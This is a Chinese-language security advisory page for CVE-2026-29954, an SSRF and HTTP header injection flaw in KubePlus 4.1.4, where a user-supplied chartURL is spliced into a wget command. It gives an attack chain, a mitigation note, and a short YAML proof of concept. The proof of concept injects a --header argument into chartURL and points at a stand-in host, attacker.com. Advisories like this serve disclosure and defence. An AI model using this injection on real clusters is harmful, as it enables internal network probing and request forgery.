IPBUF安全漏洞报告
English
CVE-2026-29954 CVSS 7.6 高危

CVE-2026-29954 KubePlus SSRF及HTTP头注入漏洞

披露日期: 2026-03-30

漏洞信息

漏洞编号
CVE-2026-29954
漏洞类型
SSRF, HTTP头注入
CVSS评分
7.6 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
KubePlus

相关标签

SSRFHTTP头注入KubePlus命令注入高危漏洞

漏洞概述

KubePlus 4.1.4版本中的mutating webhook和kubeconfiggenerator组件存在服务端请求伪造(SSRF)漏洞。该漏洞源于在处理ResourceComposition资源的chartURL字段时,系统仅对该字段进行了URL编码,却未对目标地址进行有效的安全验证。更为严重的是,kubeconfiggenerator组件在利用wget下载charts时,直接将chartURL拼接至命令行中。这一缺陷使得攻击者能够注入wget的`--header`选项,从而导致任意的HTTP头注入攻击,对系统安全性构成严重威胁。

技术细节

该漏洞的核心原理在于KubePlus处理用户输入的chartURL时缺乏严格的过滤机制,且存在不安全的命令调用方式。在KubePlus的架构中,ResourceComposition资源允许用户指定chartURL以获取Helm Charts。当kubeconfiggenerator组件接收到该URL时,它没有使用安全的HTTP客户端库,而是通过调用系统命令`wget`来下载资源。代码逻辑直接将用户可控的chartURL拼接到wget命令字符串中执行。

由于wget支持通过`--header`参数添加自定义HTTP头部,攻击者可以利用命令拼接的特性,在chartURL中插入换行符或特定转义字符,从而注入额外的wget参数。例如,通过构造包含` --header "X-Attack: payload"`的URL,攻击者可以操纵发出的HTTP请求。这不仅导致了SSRF,允许攻击者探测内网服务,还通过HTTP头注入可能绕过某些基于头部的安全检查。虽然CVSS要求高权限(PR:H),但一旦具备权限,即可利用此漏洞进行内网横向移动或敏感信息窃取。

攻击链分析

STEP 1
步骤1
攻击者获取KubePlus集群的高权限访问(PR:H)。
STEP 2
步骤2
攻击者创建或修改ResourceComposition资源,在chartURL字段中注入恶意的wget参数(如--header)。
STEP 3
步骤3
KubePlus的mutating webhook处理该请求,kubeconfiggenerator组件调用wget下载资源。
STEP 4
步骤4
由于命令拼接,wget执行了注入的参数,导致向攻击者控制的服务器发送带有自定义头部的HTTP请求(SSRF/头注入)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-29954 # Exploit by crafting a malicious ResourceComposition apiVersion: composition.kubeplus.io/v1alpha1 kind: ResourceComposition metadata: name: malicious-chart spec: # The payload injects the --header option into the wget command # URL encoding might be needed for the payload depending on exact input handling chartURL: "http://attacker.com/chart.tar.gz --header \"X-Injected-Header: POC-Exploit\"" # When processed, kubeconfiggenerator executes: # wget http://attacker.com/chart.tar.gz --header "X-Injected-Header: POC-Exploit"

影响范围

KubePlus 4.1.4

防御指南

临时缓解措施
建议立即检查集群中ResourceComposition资源的配置,限制组件对内网的访问权限(网络分段),并在官方补丁发布前,暂时禁用受影响的功能或组件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表